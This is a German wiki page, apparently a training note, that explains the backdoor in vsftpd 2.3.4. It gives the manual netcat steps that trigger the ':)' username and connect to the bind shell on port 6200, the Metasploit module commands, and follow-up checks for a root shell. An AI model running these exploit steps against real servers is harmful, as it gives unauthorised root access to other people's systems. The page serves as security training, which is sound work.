Metasploit VSFTP 2.3.4: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „= Schwachstelle = * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt * Dabei wurde eine Bind-Shell auf TCP Por…“) |
(kein Unterschied)
|
Version vom 30. August 2023, 10:46 Uhr
Schwachstelle
- In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt
- Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt
Manuell nachspielen
- Zwei Terminals vorbereiten
- Terminal 1 verbindet sich zum FTP-Server, nachdem der Exploit ausgeführt wurde, mit:
- nc IP.des.ftp.servers 6200
- Terminal 2 löst den Exploit aus
- nc IP.des.ftp.servers 21
- folgende Zeilen eingeben:
USER user:) PASS pass
- Wenn diese zwei Zeilen eingegeben wurden, kann man den Befehl auf Terminal 1 abschicken
- Der Befehl sollte nach dem Ausführen nichts anzeigen, was bedeutet, dass die Verbindung aufgebaut wurde
- folgedende Tests kann man durchführen, um zu sehen, ob man eine Shell hat:
- ip a
- id
- pwd
- ls
Metasploit benutzen
- Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren
- msfconsole
- use exploit/unix/ftp/vsftp_234_backdoor
- set RHOSTS IP.des.ftp.servers
- set RPORT 21
- set payload cmd/unix/interact
- exploit
- Nun sollte man genau wie oben eine sehr minimale Shell haben